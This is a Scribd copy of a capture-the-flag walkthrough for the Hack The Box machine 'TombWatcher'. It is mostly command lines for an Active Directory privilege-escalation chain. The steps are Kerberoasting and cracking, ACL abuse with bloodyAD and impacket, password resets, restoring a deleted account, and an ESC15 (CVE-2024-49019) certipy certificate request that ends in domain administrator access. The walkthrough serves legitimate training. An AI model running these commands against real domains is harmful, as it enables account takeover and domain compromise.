[go: up one dir, main page]
Scribd
Upload
939 views7 pages

Tomb Watcher

The document outlines a vulnerability in Active Directory Certificate Services (AD CS) that allows privilege escalation through certificate-based authentication, specifically detailing the exploitation process using certipy. It provides a series of commands and scripts for executing the attack, including user credential management and certificate requests. The guide emphasizes the security risks associated with unpatched AD CS servers and the potential for non-privileged users to issue high-privilege certificates.

Uploaded by

fayzullayevich15
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
939 views7 pages

Tomb Watcher

The document outlines a vulnerability in Active Directory Certificate Services (AD CS) that allows privilege escalation through certificate-based authentication, specifically detailing the exploitation process using certipy. It provides a series of commands and scripts for executing the attack, including user credential management and certificate requests. The guide emphasizes the security risks associated with unpatched AD CS servers and the potential for non-privileged users to issue high-privilege certificates.

Uploaded by

fayzullayevich15
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 7

TombWatcher

This box has a vulnerability in Active Directory Certificate


Services (AD CS) that allows an attacker to escalate
privileges by misusing certificate-based authentication. This
guide demonstrates how to exploit this vulnerability using
certipy.

💡 As is common in real life Windows pentests, you will start the


TombWatcher box with credentials for the following account: henry /
H3nry_987TGV!

nxc smb tombwatcher.htb -u henry -p 'H3nry_987TGV!' --rid-brute | grep "SidTypeUser" | awk -F '\\' '{print $2}' |
awk '{print $1}’

faketime "$(ntpdate -q dc01.tombwatcher.htb | cut -d ' ' -f 1,2)" python3 targetedKerberoast.py -v -d


tombwatcher.htb -u 'henry' -p 'H3nry_987TGV!'

john --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt alfred_hash

TombWatcher 1
bloodyAD --host 10.10.11.72 -d tombwatcher.htb -u 'ansible_dev$' -p :1c37d00093dc2a5f25176bf2d474afdc set
password 'SAM' 'Password123!'

python3 /usr/share/doc/python3-impacket/examples/owneredit.py -action write -target 'john' -new-owner 'sam'


'tombwatcher.htb'/'sam':'Password123!' -dc-ip 10.10.11.72

bloodyAD -u 'alfred' -p 'basketball' -d tombwatcher.htb --dc-ip 10.10.11.72 add groupMember INFRASTRUCTURE


alfred

impacket-dacledit -action write -rights 'WriteMembers' -principal "john" -target-dn


"CN=JOHN,CN=USERS,DC=TOMBWATCHER,DC=HTB" 'tombwatcher.htb'/'sam':'Password123!' -dc-ip 10.10.11.72

TombWatcher 2
bloodyAD --host 10.10.11.72 -d "tombwatcher.htb" -u "sam" -p 'Password123!' add genericAll "john" "sam"

bloodyAD --host 10.10.11.72 -d "tombwatcher.htb" -u "sam" -p 'Password123!' set password "john" 'Feb@2015'

evil-winrm -i 10.10.11.72 -u john -p Feb@2015

Exploiting CVE-2024-49019: Certificate


Authority Privilege Escalation
Get-ADObject -filter {SamAccountName -eq 'cert_admin'} -IncludeDeletedObjects

TombWatcher 3
OR

Get-ADObject -Filter 'isDeleted -eq $true' -IncludeDeletedObjects

After obtaining the deleted ObjectGUID restore it.


Restore-ADObject -Identity 938182c3-bf0b-410a-9aaa-45c8e1a02ebf

Confirm that the object has been restored by querying the object properties.
Get-ADUser -Identity cert_admin -Properties *

TombWatcher 4
Enable the restored AD account if it’s properties show disabled.

Enable-ADAccount -Identity cert_admin

And change the password.


Set-ADAccountPassword -Identity cert_admin -Reset -NewPassword (ConvertTo-SecureString "Feb@2015" -
AsPlainText -Force)

I used certipy to validate the security posture assessment to list all vulnerable
certificate templates due to unpatched AD CS servers.
certipy find -u cert_admin@tombwatcher.htb -p 'Feb@2015' -dc-ip 10.10.11.72 -vulnerable

TombWatcher 5
💡 From the results, the server is vulnerable to CVE-2024-49019. ESC15
vulnerabilities allow non-privileged users to issue certificates that can
authenticate as high-privileged accounts, posing a severe security
threat.

https://learn.microsoft.com/en-us/defender-for-identity/prevent-
certificate-enrollment-esc15

Request certificate with admin UPN


certipy req -dc-ip 10.10.11.72 -ca 'tombwatcher-CA-1' -target-ip 10.10.11.72 -u cert_admin@tombwatcher.htb -p
'Feb@2015' -template WebServer -upn administrator@tombwatcher.htb -application-policies 'Client
Authentication’

TombWatcher 6
Use Certificate for LDAP Shell Access
certipy auth -pfx administrator.pfx -dc-ip 10.10.11.72 -domain tombwatcher.htb -ldap-shell

And within LDAP - change administrator password


change_password administrator Feb@2015

Open a new terminal and WinRM to gain root access

TombWatcher 7

You might also like